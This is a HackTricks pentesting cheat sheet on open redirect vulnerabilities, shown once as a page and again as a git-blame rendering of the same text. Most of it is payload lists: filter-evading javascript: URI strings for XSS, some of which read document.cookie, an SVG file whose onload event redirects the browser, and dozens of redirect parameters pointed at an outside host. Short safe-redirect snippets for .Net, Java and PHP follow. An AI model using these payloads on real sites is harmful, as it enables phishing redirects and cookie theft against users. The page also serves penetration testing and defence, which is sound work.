hacktricks/pentesting-web/open-redirect.md



<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>


# Open redirect

## Redirect to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

## Open Redirect to XSS

```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```

# Open Redirect uploading svg files

```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```

# Common injection parameters

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```

# Code examples

### .Net

```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```

### Java

```bash
response.redirect("http://mysafedomain.com");
```

### PHP

```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```

# Tools

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

# Resources

In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.\
[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)


<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`


fix mess 2022-05-01 12:41:36 +00:00			`# Open redirect`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`## Redirect to localhost or arbitrary domains`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}`
			`[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)`
			`{% endcontent-ref %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`## Open Redirect to XSS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```bash
			`#Basic payload, javascript code is executed after "javascript:"`
			`javascript:alert(1)`

			`#Bypass "javascript" word filter with CRLF`
			`java%0d%0ascript%0d%0a:alert(0)`

			`#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed`
			`#This bypasses FILTER_VALIDATE_URL os PHP`
			`javascript://%250Aalert(1)`

			`#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)`
			`javascript://%250Aalert(1)//?1`
			`javascript://%250A1?alert(1):0`

			`#Others`
			`%09Jav%09ascript:alert(document.domain)`
			`javascript://%250Alert(document.location=document.cookie)`
			`/%09/javascript:alert(1);`
			`/%09/javascript:alert(1)`
			`//%5cjavascript:alert(1);`
			`//%5cjavascript:alert(1)`
			`/%5cjavascript:alert(1);`
			`/%5cjavascript:alert(1)`
			`javascript://%0aalert(1)`
			`<>javascript:alert(1);`
			`//javascript:alert(1);`
			`//javascript:alert(1)`
			`/javascript:alert(1);`
			`/javascript:alert(1)`
			`\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)`
			`javascript:alert(1);`
			`javascript:alert(1)`
			`javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)`
			`javascript:confirm(1)`
			`javascript://https://whitelisted.com/?z=%0Aalert(1)`
			`javascript:prompt(1)`
			`jaVAscript://whitelisted.com//%0d%0aalert(1);//`
			`javascript://whitelisted.com?%a0alert%281%29`
			`/x:1/:///%01javascript:alert(document.cookie)/`
			`";alert(0);//`
			```

fix mess 2022-05-01 12:41:36 +00:00			`# Open Redirect uploading svg files`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] one page modified 2020-12-01 10:55:31 +00:00			```markup
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`<code>`
			`<?xml version="1.0" encoding="UTF-8" standalone="yes"?>`
			`<svg`
			`onload="window.location='http://www.example.com'"`
			`xmlns="http://www.w3.org/2000/svg">`
			`</svg>`
			`</code>`
			```

fix mess 2022-05-01 12:41:36 +00:00			`# Common injection parameters`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`/{payload}`
			`?next={payload}`
			`?url={payload}`
			`?target={payload}`
			`?rurl={payload}`
			`?dest={payload}`
			`?destination={payload}`
			`?redir={payload}`
			`?redirect_uri={payload}`
			`?redirect_url={payload}`
			`?redirect={payload}`
			`/redirect/{payload}`
			`/cgi-bin/redirect.cgi?{payload}`
			`/out/{payload}`
			`/out?{payload}`
			`?view={payload}`
			`/login?to={payload}`
			`?image_url={payload}`
			`?go={payload}`
			`?return={payload}`
			`?returnTo={payload}`
			`?return_to={payload}`
			`?checkout_url={payload}`
			`?continue={payload}`
			`?return_path={payload}`
			`success=https://c1h2e1.github.io`
			`data=https://c1h2e1.github.io`
			`qurl=https://c1h2e1.github.io`
			`login=https://c1h2e1.github.io`
			`logout=https://c1h2e1.github.io`
			`ext=https://c1h2e1.github.io`
			`clickurl=https://c1h2e1.github.io`
			`goto=https://c1h2e1.github.io`
			`rit_url=https://c1h2e1.github.io`
			`forward_url=https://c1h2e1.github.io`
			`@https://c1h2e1.github.io`
			`forward=https://c1h2e1.github.io`
			`pic=https://c1h2e1.github.io`
			`callback_url=https://c1h2e1.github.io`
			`jump=https://c1h2e1.github.io`
			`jump_url=https://c1h2e1.github.io`
			`click?u=https://c1h2e1.github.io`
			`originUrl=https://c1h2e1.github.io`
			`origin=https://c1h2e1.github.io`
			`Url=https://c1h2e1.github.io`
			`desturl=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`page=https://c1h2e1.github.io`
			`u1=https://c1h2e1.github.io`
			`action=https://c1h2e1.github.io`
			`action_url=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`sp_url=https://c1h2e1.github.io`
			`service=https://c1h2e1.github.io`
			`recurl=https://c1h2e1.github.io`
			`j?url=https://c1h2e1.github.io`
			`url=//https://c1h2e1.github.io`
			`uri=https://c1h2e1.github.io`
			`u=https://c1h2e1.github.io`
			`allinurl:https://c1h2e1.github.io`
			`q=https://c1h2e1.github.io`
			`link=https://c1h2e1.github.io`
			`src=https://c1h2e1.github.io`
			`tc?src=https://c1h2e1.github.io`
			`linkAddress=https://c1h2e1.github.io`
			`location=https://c1h2e1.github.io`
			`burl=https://c1h2e1.github.io`
			`request=https://c1h2e1.github.io`
			`backurl=https://c1h2e1.github.io`
			`RedirectUrl=https://c1h2e1.github.io`
			`Redirect=https://c1h2e1.github.io`
			`ReturnUrl=https://c1h2e1.github.io`
			```

fix mess 2022-05-01 12:41:36 +00:00			`# Code examples`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`### .Net`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00
			```bash
			`response.redirect("~/mysafe-subdomain/login.aspx")`
			```

fix mess 2022-05-01 12:41:36 +00:00			`### Java`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00
			```bash
			`response.redirect("http://mysafedomain.com");`
			```

fix mess 2022-05-01 12:41:36 +00:00			`### PHP`
GitBook: [master] 2 pages modified 2020-10-22 09:33:22 +00:00
			```php
			`<?php`
			`/* browser redirections*/`
			`header("Location: http://mysafedomain.com");`
			`exit;`
			`?>`
			```

fix mess 2022-05-01 12:41:36 +00:00			`# Tools`
GitBook: [master] 354 pages modified 2020-07-29 09:22:22 +00:00
			`* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)`

fix mess 2022-05-01 12:41:36 +00:00			`# Resources`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.\`
			`[https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`[https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

			`<summary><strong>Support HackTricks and get benefits!</strong></summary>`

			`Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`

			`Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`

			`Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`

			`Join the [💬](https://emojipedia.org/speech-balloon/) [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow me on Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/carlospolopm).`

			`Share your hacking tricks submitting PRs to the [hacktricks github repo](https://github.com/carlospolop/hacktricks).`

			`</details>`